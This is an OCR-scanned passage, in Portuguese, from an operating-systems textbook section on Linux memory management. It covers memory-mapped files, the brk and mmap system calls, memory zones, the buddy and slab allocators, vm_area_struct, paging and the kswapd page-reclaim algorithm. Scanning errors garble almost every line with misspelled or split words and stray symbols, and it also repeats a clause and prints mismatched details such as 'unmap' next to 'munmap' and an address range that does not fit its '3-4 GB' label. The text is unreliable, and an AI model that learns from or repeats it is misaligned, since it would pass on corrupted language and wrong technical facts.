manlio do segmento de pilha. 

Quando um programa se inicia, sua pilha na o esta va- 
zia, pclo contrario: cla contćin todas as variavcis dc am- 
biente (sheli) assim como a linha de comando digitada no 
shell ąuando de fol invocado. Dessa mancira, um progra¬ 
ma pode descobrir seus argumentom Por exemplo, quando 
o comando 

cp sre dest 

e digitado, o programa cp e execmado com a cadeia r cp sre 
dest' na pilha e, assim, dc pode enconirar os no mes do ar- 
qmvo-lontc e do arquivo-dcslino. A cadeia e represemada 
como um veior de ponletros para os snnbolos gra ma lica is 
da cadeia propriamente di ta, a fim de facilitar sua analise 
siniatica. 

Quando dois usuarios esta o ex ecu land o o mesmo pro- 
grama, como um editor, c possfvel mas ineficiente, manier 
duas cópias do código do programa do editor na memória 
ao mesmo tempo. Em vcz disso, muitos sistemas Li nu x dao 
su porte a segmentos de código compartilhados. Nas fi - 
guras 10.8(a) e I0.S(c), vemos dois processos, A e B, com o 
mesmo segmento de código. Na Figura lO.S{b), vemos urna 
possivd forma da memória lisica, na qual ambos os pro¬ 
cessos companilham a mes ma panc do código. O mapea¬ 
mento e kito pdo hardware dc memória virtuah 

Os segmentos de dados c pilha nuiiea sao comparii- 
Ihados, exceto após um forR, e, ucsse caso, somente aque- 


ias paginas que nao sao modificadas. Se um deies predsa 
crescer e nao existe espaęo adjacente para isso, nao tem 
próbie ma. pois as paginas virtuais adjaccntcs nao predsam 
ser mapeadas em paginas ftsicas adjaccntes. 

Em alguns computadores, o hardware da suporte a es- 
paęos dc endereęamento sc parad os para łnstruęocs e dados. 
Ouando essa caracteristica esta dispomvel, o Linux pode 
usa-la. Por exemplo, se um computador com endereęos de 
32 bhs tem essa caracteristica, e posswel empregar 2 u bits 
de espaęo de endereęamento para instmęóes e um adicio- 
nal de 2^-bits de espaęo de endereęamento para ser compar- 
tilhado entre os segmentos de dados e pilha. Um jimip para 
0 salta para o endereęo 0 do espaęo de código, enąuanto um 
mav€ dc 0 usa o endereęo 0 do espaęo de dados, Essa caracte¬ 
ristica duplica o espaęo dc endereęamento disponiYch 

Alem de alocar dinamicamente mais memória, os pro- 
cessos no Lmux conseguem acessar dados de arquivos por 
mcio de arquivos mapeados em memória, Essa caracie - 
rfstica possibilita mapcar arquivos em unia parte do espaęo 
de endereęamento do proeesso, permitindo que o arquivo 
seja lido e escrito como se ele fosse imi vetor de byles na 
memória. Mapcar um arquivo na memória facilita muito 
mais o acesso aleatório do que usar cliamadas de sistema 
para E/S como read e write. As bibliotecas compartilhadas 
sao acessadaspor metodo mapeamentoem memória usan- 
do esse mecanismo, Na Figura !0.9, vemos um arquivo 
mapeado em dois processos ao mesmo tempo, em cspaęos 
de endereęamento diferemes. 

Urna yantagem adicional do mapeamento de arquivos 
e que dois ou mais processos podem mapear o mesmo ar- 
quivo simultaneamenie. As escriias no arqnivo fcitas por 
qualquer um deies sao instanianeamenie visfveis para os 
demais proeessos. De falo, por tncio do mapeamento de 
um arquivo auxiliar {que sera descartado depois quc todos 
os processos tenham finalizado), esse mecanismo fornecc 
um canal dc alta largura de banda para niultiplos processos 


Proeesso A Memória fisica 

Ponteiro da pilha — 


Arquivo 

mapeado 


{ 


20 K 

8 K 
OK 



Proeesso B 
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Dados 


Código 


{C) 


Ponteiro da pilha 


Urquivo 
J mapeado 


24 K 

8 K 
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I Figura 10.9 Dois processos podem compartilhar um arquivo mapeado. 
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compartilharem memória. No caso mais exiremo, dois o u 
mais processos podem mapear um arqmvo que abranja o 
cspaęo dc endereęamento to do, fornecendo uma forma de 
compartilhamcnto intermediario ąuando comparada coni 
o compartilhamcnto intermediario ąuando comparada 
com o compartilhamento entre processos e entre threads. 
Aqui o cspaęo de endereęamento e compartilhado (como 
nos threads), mas cada processo mantem seus arquivos 
abertos e seus smais, por exempio, diferemememe dos 
threads. Na pratica, porem, nunca sao criados dois espaęos 
de endereęamento exatamente cor respondent es. 

_ 10.4.21 Chamadas de sistema para 

gerendamento de memória no 
Linux 

O POSIX nao espedfica ąuaisąuer chamadas de sis- 
tema para gerendamento de memória — esse tópico foi 
cortskierado muito dependente dc maąuina para que fosse 
padronizado. Em vez disso, o problema foi disfaręado, pro- 
pondo que os programas que predsarem do gerendamento 
de memória dinamica poderao usar o proce diemen to de 
biblioteca rmiłloc (defmida na linguagem C padrao ANSI). 
O modo como malloc e implementado esta fora do escopo 
do padrao POSfX. Em alguns dreulos, essa ab orda gem e 
eonhedda como transferencia de responsabilidade. 

Na p rat i ca, muitos sistemas Linux tern chamadas dc sis¬ 
tema para o gerendamento de memória. As mais comuns 
sao apresentadas na Tabela 10.5. Brk espedfica o tamanho 
do segmento de dados Informando o endereęo do primeiro 
by te após seu finał. Se o novo valor e maior do ąue o ami- 
go, o segment o de dados aumema; caso contrario, diminiu. 

As chamadas de sistema mmap e munmap eon troi a m os 
arquivos mapeados em memória. O primeiro para metro de 
mmap, addr, dc termin a o endereęo no qual o arquivo (ou 
parte dele) e mapeado. Ele deve ser um miiltiplo do ta ma¬ 
nilo da pagina. Se esse para metro e 0, o sistema determina 
o endereęo por si próprio e o retorna em a . O segundo pa¬ 
rametro, len, diz quamos byies devem ser mapeados. Ele 
tambem deve ser um miiltiplo do tamanho da pagina. O 
terceiro parametro, prot, determina a proteęao para o ar- 
quivo mapeado. Ele pode ser marca do como para lei tura, 
para escrita, para execuęao ou a lg u ma combinaęao dessas 
possibilidades. O quarto parametro f flags, controla se o ar- 


qmvG e privado ou compartilhado e se addr e uma exigen- 
cia ou meramente uma sugestao. O quinto parametro, fd, 
e o descritor de arquivo a ser mapeado, Somente arquivos 
abertos podem ser mapeados, de modo que r para mapear 
um arquivo na memória, dc devc primeiro ser aberto. Por 
firn, offset diz a posięao do arquivo ondc dcvc ser iniciado o 
mapcamcnto. Ele nao c ncccssario ąuando sc deseja mapear 
a partii do byte 0; caso eon tran o, sini 

A outra chamada, unmap, remove um arquivo mapea¬ 
do. Se somente parte dele e removida do mapeamento, o 
restante continua mapeado, 

_ 10.4.31 Implementacjo do gerendamento 

de memória no Litiux 

Cada processo do Linux cm uma maąuina dc 32 bals 
normalnienie recebe 3 GB de cspaęo de endereęamento 
virtua! para seu uso, e o I GB restante fica reservado para 
suas tabelas de paginas e outros dados do ruicleo. o cspaęo 
de 1 GS do nucleo nao e visivel ąuando no modo usuario, 
mas se torna acessfvel ąuando o processo desvia a exe- 
cuęao para o nucleo. A memória do nucleo normalmem 
te fi Cii na parte baixa da memória Esica, mas e mapeada 
no cspaęo hricial dc 1 GB de cada processo de cspaęo de 
endereęamento virtual, entre os cndereęos 0x00000000 e 
OxFFFFFFFF (3-4 GB). O cspaęo de endereęamento e cria- 
do com o processo e c sobrescrito por unia cli a mada dc 
sistema exec. 

Para permitir que muHiplos processos compartilhem a 
memória Esica subjaccntc, o Linux monitora o uso da me¬ 
mória Esica, aloca mais memória eon formę a necessidade 
dos processos do usuario ou dos componentes do nucleo, 
mapeia dinamicameme poręóes da memória Esica no es- 
paęo de endereęamento de diferentes processos e carrega e 
descarrega dinamicamente progranias execulaveis, arquivos 
e outras informaęoes dc es Lado eon formę a necessidade, de 
modo a utilizar os recursos da plaiaforma de maneira cfi- 
ciente c garantir o progresso da exećuęao, O restante deste 
capitulo descreve a iinplementaęao de varios niecanismos no 
nucleo do Linux que sao responsavds por essas operaęóes. 

Gerendamento da memória fisica 

Por eon ta de algumas idiossinerasias de hardware em 
muitos sistemas, nem todas as memórias ffsicas podem ser 


Chamada de sistema 

Descrięao 

s ^ brk(addr) 

Altera o tamanho do segmento de dados 

a = mmapfaddr, len, pnoi, flags, fd, offset) 

Mapeia um arquivo na memória 

s = unmap(addr, fen) 

Remove o mapeamento do arquivo 


Tabela 10.5 Afgumas chamadas de sistema relacionadas ao gerenciamento da memória, O código de retorno s e -1 se ocorrer 
algum erro: a e addr sśo endereęos de memória, (en e um tamanho, prot controla a proteęao, ffags s&o bits mistos, fd e um descritor 
de arquivo e offset ó um deslocamento de arquivo. 
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iratadas da niesma forma, especialnieme no que diz respeU 
to a E/S e memória virtual. O Lirmx faz distinęao entre tres 
tipos dc zonas dc memória; 

1. Z0NE_DMA — paginas que podem ser utilizadas 
para operaęoes de DMA, 

2. ZONE^NORMAL — paginas normais reguła rmen- 
te mapeadas. 

3. ZO NEJŚIGHMEM — paginas com endereęos dc 
mcmória altos, quc nao sao permanentemente ma¬ 
peadas. 

As fronteiras exaias e o projeto das zonas de memória 
dependent da arqmtetura. No hardware x8ó, por exemplo, 
determmados disposiiivos podem execuur operaęoes de 
DMA somenie nos primeiros 16 MB do espaęo de ende- 
reęamciuo e, portamo, a ZONE_DMA esta na faixa de 0-16 
MB + Alem disso, o hardware nao consegue mapeardireta- 
mente os endereęos de memória ad ma de 896 MB e, por 
isso, a ZQNE_HIGHMEM esta em alguma area adma dessa 
faixa. A ZGNE_NORMAL esta entre as dnas anteriores. Nas 
plaiaformas x8ó, os primeiros 896 MB do espaęo de endc- 
reęamento do Linux sao mapcados diretamcnte, ertąuanto 
os 128 MB restantes do espaęo de endcreęamemo do nu - 
cleo sao miłizados para acessar regioes da memória aha. 0 
nu.cleo mantem urna estrutura ik zonas para cada urna das 
tres zonas e consegue cxecutar alocaęoes de memória para 
as tres zonas separadameme. 


No Lin u x, a memória prindpal e formada por tres 
partes. As duas pritneiras, o mi cleo e o mapa de memória, 
estao fixas na memória (on seja, stias paginas nunca sao 
exclufdas), O restante da memória esta dividido em mol- 
duras dc paginas e cada uma dclas pode contcr urna pagina 
de código, dados ou pilha, uma tabela dc paginas ou estar 
cm uma lista livrc. 

O mi de o mantem um mapa da memória principal que 
contem todas as informaęoes sobre o uso da memória fisica 
no sistema, como suas zonas, moiduras de paginas livres etc. 
Aorganizaęao da informaęao, mostrada na Figura 10.10, c 
apresentada a seguir. 

Em primeiro lugar, o Linux mantem um velor de des- 
critores de paginas do lipo page para cada moldura de pa¬ 
gina fisi ca no sistema, chamado mem_map , Cada de serii or 
de pagina contem um ponteiro para o espaęo de endereęa- 
mento ao qual pertence c, caso a pagina nao esteja livre, 
um par de ponteiros que permite a criaęao dc listas ciupią- 
mente encadeadas com outros dcscritorcs para, por cxcm- 
plo, agrupar todas as moiduras dc paginas livres c alguns 
outros campos, Na Figura 10,10, o dc salto r de pagina para 
a pagina 150 contem um mapeamento para o espaęo dc 
endereęamento ao qual a pagina palence. As paginas 70, 
80 e 200 estao livres e encadeadas. O tamanho do descritor 
de pagina e 32 bytes e, assim, o veior mem_map pode con- 
sumir menos do que i por cento da memória fisica (para 
uma moldura de pagina de 4 KB). 


Memjnap: vetor 
de descritores de paginas 



descritor de nó 


Memória fisica 



I Figura 10.10 Representaęao da memória principal no Linux. 
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Como a memória fisica esta dividida em zonas, para 
ca da żona o Linux mantem um descritor dezoms quc cen¬ 
tem informaęoes sobre a utilizaęao da memória em cada 
zona, como nu mero de paginas ativas ou inativas, mar- 
caęoes altas e baixas a serem utilizadas pelo algoritmo de 
substituięao de paginas descrito rnais adiante neste capftu¬ 
lo, assim como muitos outros campos. 

Um descritor de zonas contem um mor de areas livres. 
O /-esimo element o desse vetor idem id ca o primeiro descritor 
de pagma do primeiro bloco de 2' paginas 3ivres, Como podem 
existir muliiplos blocos de 2 paginas livres, o Linux utiliza o 
par de pomeiios de descritores de paginas cm cada demento 
page para eonseguir encadea-los, Essas mfonnaęóes sao osa¬ 
da s nas operaęoes de alocaęao de memória su port ad as pelo Li- 
nux. Na Figura 10.10, o vetor free_area[0], que idemifka todas 
as areas livres da memória prmdpal, compostas por somente 
urna moldura de pagina (ja que 2° e igual a 1), aponta para 
a pagina 70, a primeira das tres areas llvres. Os outros blocos 
livres de tamanho igual a 1 podem ser alcanęados por meio 
das ligaęoes em cada um dos descritores dc paginas. 

Finalmente, como o Linux e portali! para arąuiteturas 
NU M A (na qual diferentes endereęosde memória posśiiein 
tempos de acesso basta nie variados), para difereneiar emre 
memória fisica em diferentes nos (e evilar a alocaęao de 
estru tu ras de dados emre eles), utiliza-se um descritor de nó. 
Cada descritor de nó contem informaęao sobre o uso da 
memória e das zonas naquele nó em particular. Nas piata- 
for mas NU MA, o Linux dcscreve toda a memória por meto 
de um descritor de nó. Os primeiros bits em cada descritor de 
pagina sao utilizados para i d en t i fi car o nó e a zona a qual a 
moldura de pagina perten.ee . 

Para que o mecanismo de paginaęao seja eheiente cm 
a rq u ile Lu ras de 32 e 64 bits, o Unux utiliza um esąuema 
de paginas em ąuatro irivd$. Um esąuema original de tres 
nvveis de paginas, originalmenie incluido no sistema para 
o Alpha, foi expandido depois da versao 2.6.10 do Linu x e, 
a partii da versao 2,6.11, passou a ser utilizado o esquema 
de ąuatro paginas. Cada endereęo viitual e decomposto em 
cinco campos, conforme mostra a Figura 10,11. Os campos 


de diretório sao milizados como um mdice para o direto- 
rio de pagina apropriado (que e privado e existe um asso- 
ciado a cada processo). O valor encontrado e urn ponteiro 
para um dos diretórios do mvcl seguinte, que sao novamen- 
te indexados por um campo do endereęo virtual. A entrada 
selccionada no diretório de pagina do meio aponta para 
a tabela dc paginas finał, que esta indexada pelo campo 
de pagina do endereęo virtuaL A entrada encontrada aqui 
aponta para a pagina necessaria. No Pentium, que utiliza 
paginaęao dc dois nivcis, o diretório superior e do meio de 
cada pagina possui somente u ma entrada e, portanto, a en- 
trada do diretório global efetivamenie escolhe a tabela de 
pagina a ser utilizada. Analogamente, a paginaęao de tres 
nfvds pode ser utilizada ąuando necessario, configu ran do 
para 0 o campo de tamanho do diretório de pagina superior. 

A memória fisica serve para varios propos i tos, O nu- 
de o propriamente dito fica totalmente residente na me¬ 
mória — nenhuma parte dcle ć paginada para o disco. O 
restante da memória c disponibilizado para paginas dos 
usuarios, a cachc de paginas e outros propósitos. A cache 
de paginas mantem blocos de arquivos lidos recentemente 
ou que podem ser lidos cm um futuro próximo ou paginas 
de blocos de arquivos que precisam ser escritas no disco, 
como aqudas que tenham sido criadas a partir dos pro- 
cessos do modo usuario e que tenham sido movirias para 
o disco. Ela tem um tamanho dinamico e compete com os 
processos dos usuarios pelo mesrno conjunio de paginas. A 
cache de paginaęao nao e realmente urna cachc separada, 
mas simplesineme o conjunto de paginas dos usuarios que 
nao sao necessarias ha muito tempo e que estao esperando 
ate serem pagina das para o disco. Se urna pagina da cache 
de paginaęao c reutilizada antes de ser retirada da memó- 
ria, cla pode ser recuperada rapklamente. 

Alem disso, o Linux da su porte a mód u los carregados 
dinamicamente — em geral, drivers de dispositivos, que 
podem ter tamanhos quaisquer e cada um dcve ser aloca- 
do em uma parte ctmrigua da memória do nucleo. Como 
conseąuencia dessas exigencias, ele gerencia memória fisi¬ 
ca para poder adąuirir urna parte da memória de tamanho 


Pagina 



I Figura 10.11 O Linux utiliza tabelas de paginas de quatro ntveis. 
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qualquer quando bem entender. O algoritmo que de usa e 
conhecido como algoritmo companheiro (budrfy algorithm) 
e e descrito a seguir. 

Mecanismos de alocaęao de memória 

O Linux da su porte a diversos mecanismos para aloca¬ 
ęao de memória. O princtpal ddcs e denominado alocador 
de paginas, que opera utilizando o conhecido algoritmo 
companheiro (Inulrfy aIgorithm ). 

A ideia basica para a alocaęao de um bloco de memória 
e a seguintc; inicialmenie, a memória consiste em urna divl- 
sao comfgua unica, com 64 paginas no exemplo simples da 
Figura 10.12(a>. Quando uma reąuistęao de memória e feita, 
a ąuantidade requcrida e primeiro arredondada para uma 
polenda de 2 — por excmplo, oito paginas. A memória loda 
e, cniao, dividida peia metade, como cm (b). Visio que cada 
uma dessas parłeś ainda e muito grandę, a parte mai$abaixo 
c dividida na me ta de novamente (c) e de novo dividida (d). 
Nesse ponto, temos um bloco de tamanho corrcto quc e alo- 
cado para o cha ma don como sombreado em (d), 

Imagine uma segunda solicitaęao de oito paginas. Essa 
solicitaęao pode ser atendida diretameme agora (e). Nesse 
moment o, e fciia uma lerceira solicitaęao de ąuairo pagi- 
nas. Nesse caso, o menor bloco dispomvel ć dividido (f) e 
meta de dek: e alocada (g). Em segukła, o segundo bloco de 
oito ć łiberado (h), Por firn o outro bloco de oito paginas 
tam bem e łiberado. Visto que os dois biocos adjacentes de 
oito paginas que foram liberadossao companheiros, isio ć, 
originados do mesmo bloco de 16 paginas, eles sao fundi- 
dos para .refazer o bloco de 16 paginas (i). 

O Linux gcrencia memória nsando o algoritmo com¬ 
panheiro, com a adięao de um vetor no qual o primeiro 
elemenio e a cabeęa de urna lista de biocos com o tamanho 
de uma unidadc, o segundo clcmento ć a cabeęa de uma 
lista de biocos com tamanho dc duas miki a des, o próximo 
clcmento apoma para biocos dc quatro unidades etc. Dessa 
maneira, qualquer bloco de potencja de 2 pode ser encon- 
trado rapldamente. 

Esse algoritmo gera uma consideravel fragmentaęao 
interna pois, se voce d esej a urn bloco de 65 paginas, voce 
tern de solidtar e obter um bloco de 12S paginas. 


Para amenizar esse probiernia, o Linux tern uma segirn- 
da alocaęao de memória, denominada alocador de fatias 
(slab), que obtem biocos usando o algoritmo companheiro 
e depois eona fatias (unidades menores) destes biocos e ge- 
renda cssas unidades menores separadamenie. 

Como o mielec normalnienie cria e destrói objetos de 
determinado tipo (por exeinplo, laskjłrutt), ele confia em 
areas denominadas cache de objetos. Essas caches sao for- 
madas por ponteiros para uma on inais part es capazes de ar- 
mazenar um nu mero de objetos do mesmo lipo. Cada uma 
dessas partes pode estar cheia, pardalmente cheia ou vazia. 

Quando o nudeo precisa alocar um novo descriior de 
processos, ou seja, uma nova ta$k_strud t de busca esirulta¬ 
ras de tarefas na cache de objetos e, primeiro, tema encon- 
trar uma Talia pardalmente cheia para alocar a task_struct. 
Se essa fatia nao existir, de busca na lisia de fatias vazias. 
Fina Intern e, caso seja nece ssano, ele ira alocar uma nova 
fatia, amtazenar a task^struct nela c figar a fatia a estrutura 
dc tarefas na cache dc objetos. O servięo dc nudeo kmalloc, 
que alo ca regioes dc memória fhiaimcnte contiguas no cs- 
paęo dc endereęamento do nudeo, e implementado usan- 
do a intcrfacc de farias c cache de objetos descrita aqui. 

Um terceiro alocador de memória, vmal!oc, tambem esta 
dispomvel e e utilizado quando a memória solicitada precisa 
apenas ser contfgua no espaęo virtuaj, mas nao na memória 
fisica. Na pratica, isso ocorre com a maioria das memórias 
solicitadas* Uma cxceęao ocorre com os dispositivos, quc 
esta o do outro lado do barramento e da imidade de geren- 
ciamento de memória c quc, portanto, nao comprecndem 
endereęos virtuais. O uso de mnalloc, emretanlo, resulia em 
certa perda de desempenho e acontece principalmente na 
alocaęao de grandes qnantidades de espaęo de endereęa- 
mento virtual contfguo, tal como na inseręao dinamica de 
módulos de nudeo. Todos esses alocadores de memória sao 
oriundos dos alocadores no System V, 

Representaęao do espaęo de endereęamento virtual 

O espaęo de endereęamento virtual esta dividido em 
areas ou regioes homogeneas, contiguas e alinhadas nas pa¬ 
ginas. Isso signiftca que cada arca e composta por um gru¬ 
po de paginas conseaitivas com as mes mas propriedades 
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I Figura 10.12 Funcionamento do algoritmo companheiro. 
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de proteęao e paginaęao. Os segment os de texio e arquivos 
mapeados sao exemplos dessas areas {Figura 10.JO). Podem 
existir buracos entre as areas no espaęo de cndereęamen- 
to virtual. Qualquer referenda dc memória que lcve a um 
buraco resulta em urna falta de pagina fatah O tamanho da 
pagina ć fixo — por excniplo, 4 KB para o Pentium e 8 KB 
para o Alpha. Comeęando pdo Pentium, que da suporte a 
molduras de p agi nas de ale 4 MB, o Liriux conseguc da su- 
porte a molduras cnormcs de 4 MB cada. Alem disso, no 
modo de extensao do endereęo fisico (physical addrzss ex- 
temion — PAE), utilizado em certas arquileturas de 32 bits 
para ampliar o espaęo de endereęamento do processo para 
alem de 4 GB, sao suportadas paginas de ate 2 MB. 

Cada area e deser i la no nudeo por meio de unia entra- 
da vm_area_siruct. Todas as vm_area_structs> de um processo 
sao ligadas em urna lista ordenada no espaęo de endereęa¬ 
mento virtual, de modo que todas as paginas possana ser 
encontradas. Quando a lista se torna muito longa (mais 
do que 32 eniradas), u ma arvore e criada para agilizar a 
pesqmsa, A en trąd a vm_arM_$trua lista as propriedades da 
area. As propriedades in forma ni o modo de proteęao (por 
exemplo, soinente leitura ou Idiura/eserita), se esta fixada 
na memória (nao pagina vel) e para quał dircęao ela cresce 
{sobe ate os segmentos de dados, desce para as pilhas). 

A vm_ami_struct tam be ni registra se a area e privada 
ao processo ou compartilhada com um ou mais processos. 
Após um fork, o Linux faz unia cópia da lista da area para 
o processo fil ho. mas eon figura o pa i e o fil ho para aponta- 
rern para as mesmas tabeias de paginas. As areas sao mar- 
cadas com permissao de leitura/escrita, mas as paginas sao 
marcadas com permissao de somente leitura. Se um dos 
processos lenta escrever em urna pagina, ocorre unia falha 
dc proteęao e o nudeo pcrcebc quc a area tern logicamen¬ 
ie a permissao de gravaęao, mas a pagina, nao; com issu, 
ele da ao processo urna cópia da pagina marcando-a com 
permissao de leitura/escrita. Esse niecąnismo implemenia 
a tótnka cópia na escrila. 

A \nn_area_stmci tambem registra sc a area tern ar¬ 
mazenamento de apoio no disco assoriado e, caso tenha, 
on de. Os segmentos de código usam binarios executavcis 
como a rma ze na men to de apoio e os arquivos mapeados na 
memória fazom uso dos próprłos arquivos do disco como 
armazenamento de apoio. Omras areas, como a pilha, nao 
tern armazenamento de apoio associado ate que tenbam 
sido paginadas para o disco. 

Um descritor de pagina de mvd superior, mm Jima, co- 
leta informaęoes sobre todas as areas da memória viriuai que 
pertenęam a um espaęo de endereęamento — informaęoes 
sobre os diferemes segmentos (texto, dados, pilha), sobre 
usuarios compartilhando o mesmo espaęo de endereęamen¬ 
to etc. Todos os elementos de um espaęo de endereęamento 
da estru tura vm_arca_siruct pode ni ser acessadoś dc duas for¬ 
ma s por meio de seus descritores de memória. Primeiro, eles 
estao organizadas em listas encadeadas ordenadas por en- 


dereęos de memória virtual. Essa organizaęao e util quando 
todas as areas de memória vinual predsam ser acessadas, 
ou quando o nudeo esta em busca de urna regiao da me¬ 
mória vinual de um tamanho espedfico. Alem disso, as en- 
tradas na vm_arm_stnicł estao organizadas em urna arvore 
binaria 'rubro-negra' — uma estru tura de dados otimizada 
para buscas rapidas, Essc metodo c utilizado ąuando uma 
memória virtual especffica precisa ser acessada, Permitindo 
o acesso a elementos do espaęo de endereęamento do pro¬ 
cesso por esses dois metodos, o Limtx usa mais estados por 
processo, mas permite que diferemes operaęoes de nudeo 
utilizem o metodo de acesso mais eficiente para a tarefa em 
execuęao. 

10-4.41 Paginaęao no Linsuc 

Gs antigos sisiemas UN1X confiaYam em um proces¬ 
so trocador para movimcntar processos inteiros entre a 
memória e o disco, sempre que a ąuamidade dc processos 
ativos nao cabia na memória ftsica. O Linux, assim como 
ou tras yersóes mais modernas do UNIX, nao move mais 
processos inteiros. A unidade dc gcrencianiemo da lncmó- 
ria prindpal e urna pagina e ąuasc todos os coniponcntes 
dc gerendamento de memória opera m com a gran ulari- 
dade de uma pagina. O subsistema de troca tambem opera 
com grami larIda dc de uma pagina e esta fortemenie rela- 
cionado ao algoritmo de recuperaęao de molduras de 
paginas {pttgeframe rechmmm] algorithm — PFRA) descrito 
mais adiame. 

No Linux, a kicia basica jior tras da paginaęao c sim- 
ples; um processo nao precisa esiar inteiro na memória 
para quc seja executado, E nccessario simplcsmente que 
a estru tura do usuario c as tabeias de paginas estejam la. 
Sc isso acontecer, o processo e considerado "na memória" e 
pode ser escalonado para exccuęao. As paginas de código, 
dados e segmentos de pilha sao lcvadas para a memória 
dinamicamcTUe, uma a uma, eon formę sao referenriadas. 
Se a estru tura do usuario e as tabeias de paginas nao esti- 
vcrem na memória, o processo nao pode ser executado ale 
que o trocador as traga. 

Uma parte da paginaęao ć implementada pelo nucleo 
e a o utrą, pdo novo processo denominado daemon de 
paginaęao, que e um processo 2 (o processo Oćo pro- 
ccsso o ci oso, tradicionalmcnte cha mado dc trocador, c o 
processo 1 e o but mostrado na Figura 10.7). Como todos 
os daemons, o de paginaęao e periodteameme exccutado. 
Urna vez acordado, cle olha a sua volta cm busca de algum 
trabalho a ser feito. Se de vir que o ntiinero dc paginas 
na lisia de paginas de memória livres esta muito baim ele 
comeęa a liberar mais paginas. 

O Linux e um sistema quc trabalha por demanda de 
paginas, sem pre-paginaęao e sem nenhum conccito dc con- 
junto dc trabalho (embora exista uma chamada dc sistema 
na qual um usuario pode dar uma dica dc que determina- 
da pagina sera necessaria em brcvc, na esperanęa dc que 
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ela esteja la quando for necessaria). Segmentos de texio 
e arquivos mapeados sao paginados para seus respeclivos 
arquivos no disco. Todo o resto e paginado para a partięao 
de paginaęao (se existir) on para um dos arquivos dc pagi- 
naęao dc tamanho fixo, quc formani a chamada area de 
troca, Osarquivos dc paginaęao podcm seradidonados ou 
removidos dinamicamcntc c cada um tein unia ptioridadc, 
A paginaęao para urna partięao diferente, acessada como 
um dispositivo bruto, e mais efideme do que a paginaęao 
para arqmvos por diversos motivos. Primeiro, o mapea- 
mento entre blocos de arquivo e blocos de disco nao e ne- 
cessario (o que eeonomiza a leirura indireta de blocos por 
parte da E/S do disco). S eg mi do, as escritas ffsicas podcm 
ler qualquer tamanho, e nao someme o tamanho do bloco 
do arqiiivo. Terce!ro, urna pagina sempre e contiguamente 
cscrita cm disco, mas, com um arquivo dc paginaęao, ela 
pode ou nao ser cscrita. 

As paginas só sao alocadas no dispositivo ou parlięao 
de paginaęao quando sao necessarias. Cada dispositivo ou 
arquivo e iniciado com um mapa de bits informando quais 
as paginas estao iivres. Quando unia pagina sem memória 
auxiliar precisa sair da memória, a partięao ou arquivo dc 
pagina dc mais olta prioridnde que ainda possui espaęo c 
cscolhido c a pagina ć alocada nde. Normalmcnte, quando 
existe unia partięao de pagina, da possui prioridadc mais 
alta do que qualquer arquivo dc paginaęao. A tabela dc 
paginas c atualizada dc forma a refletir quc a pagina nao 
esta mais na memória (configura-se, por exemplo, o bit dc 
pagina ausente) e a localizaęao do disco e escrita na ciura da 
da tabela de paginas. 

Algoritmo de recuperaęao de molduras de paginas 

A substituięao de paginas funcioua da seguinte manei- 
ra: o Liniix lenta manter algumas paginas livres, de forma quc 
elas possani estar disponiveis ąuando necessario. fi claro que 
esse grupo precisa ser co usta me menie reabastecuio* O algo¬ 
ritmo de recuperaęao de molduras de paginas [pąje fru¬ 
nie reckiming aigońthm — PFRA) e responsavel por isso. 

A mes dc mais nada, o Linux faz distinęao entre qua- 
iro tipos de paginas: nao muper&ms* troarnl $incronizdvd 
c dcsairtdvd. As paginas nao recuperavcis — que induem 
as paginas resmadas ou bloąueadas, as pil ha s do modo 
nuciec e afins — nao podcm ser exduidas da memória. 
As paginas troca vcis devem ser escritas dc volta na area dc 
troca ou na partięao de paginaęao do disco ames que sejani 
solicitadas. As paginas smcronizaveis devem ser escritas de 
volta no disco se forem mareadas como sujas* Por firn, as 
paginas descariaveis podem ser imediatamente solicitadas. 

No momento da inidalizaęao, o ink inicia um dacnion 
dc pagina — kswapd —, mu para cada nó dc memória, c 
os configu ra para serem periodicamente cxeaitados, Cada 
vez que o kswapd acorda, cle verifica se existem paginas 
iivres su li ciem es por meio da comparaęao dos marcadores 
alias e baixas com o uso atual da memória em cada zona de 
memória. Se houver memória sufidenie, ele volta a dormir 


(embora possa ser despertado mais cedo caso novas paginas 
sejani necessarias). Se a memória disponwel para qualquer 
urna das zonas esiiver abaixo de um limite, kswapd inicia o 
algoritmo de recuperaęao de molduras de paginas. A cada 
cxecuęao, somentc um determinado n ii mero dc paginas 
c reda mado — normalmcnte 32. Essc numero ć limitado 
para eontrolar a pressao dc E/S (o numero dc escritas cm 
disco, tria das du ranie o PFRA)* Tanio o numero dc paginas 
solicitadas quamo o numero total dc paginas yarridas sao 
parametros eon figura veis. 

A cada vez quc o PFRA c cxecutado, ele lenta recupcrar 
as paginas mais faccis para, cm seguida, passar para as mais 
diffccis. As paginas dcscartavcis ou nao referenda das po¬ 
dcm ser rccuperadas imediatamente por meio dc sua mu- 
danęa para a lista dc livrcs da zona. Depois disso. cle busca 
as paginas com memória auxiliar que nao fora ni referenda- 
das recentemente, utilizando um algoritmo semelhante ao 
do ręlógio. Em seguida vem as paginas companilhadas que 
os nsuarios parę celu nao milizar com freąuenda. Nesse lipo 
de pagina, o desafto e que, se urna entrada de pagina for so- 
licitada, as tabeias de paginas de todos os espaęos de endere- 
ęamerno que originalmente compartilham a pagina devcm 
ser atualizadas de maneira smerona. O Linux mantem efi- 
cicntes estruturas organizadas como arvores para cnconlrar 
facilmcnte todos os usua-rios dc unia pagina compartilha- 
da* As paginas dc usuario coimins sao localizadas cm segui¬ 
da c, caso sejani escolhidas para serem despejadas, devem 
ser agendadas para cscrita na area cle troca. A agressivida- 
de da troca de paginas (swappiness) do sistema, ou seja, a 
proporęao de paginas com memória auxiliar em relaęao as 
paginas que predsam ser exclufdas da memória seleciona- 
das durante o PFRA, e um para metro ajustavel do algorit¬ 
mo. Finalmente, se uma pagina for invalida, compartilhada, 
nao cstiver na memória, cstiver bloąueada ou sendo usada 
para DMA, ela e ignorada. 

O PFRA Litiliza um algoritmo semelhante ao do reló- 
gio para seledonar, segundo uma determinada categoria, 
as paginas mais antigas para despejo. Na parte mais impor- 
tante desse algoritmo esta um laęo que varre as listas de 
ativo e inativo de cada zona, ternando solicitar diferentes 
tipos de pagina, com diferentes gratis dc urgencia. O va)or 
da urgencia c passa do como u ni paranietro c informa ao 
proccdimcnto o quanto dc csforęo c necessario na solid- 
taęao dc algumas paginas, Normalmcnte, isso representa a 
qoaniidadc dc paginas que devem ser inspecionadas antes 
da desistencia. 

Durante o PFRA, as paginas se movimentam entre 
a lista dc alivas c a dc inativas da maneira como aparece 
na Figura 10,13. Para manter determinadas heurfsticas c 
lentar localizar as paginas que nao lorain rcfcrcnciadas e 
quc provavclmente nao serao necessarias em um futuro 
próximo, o PFRA mantem dois sinalizadores: ativa/inativa 
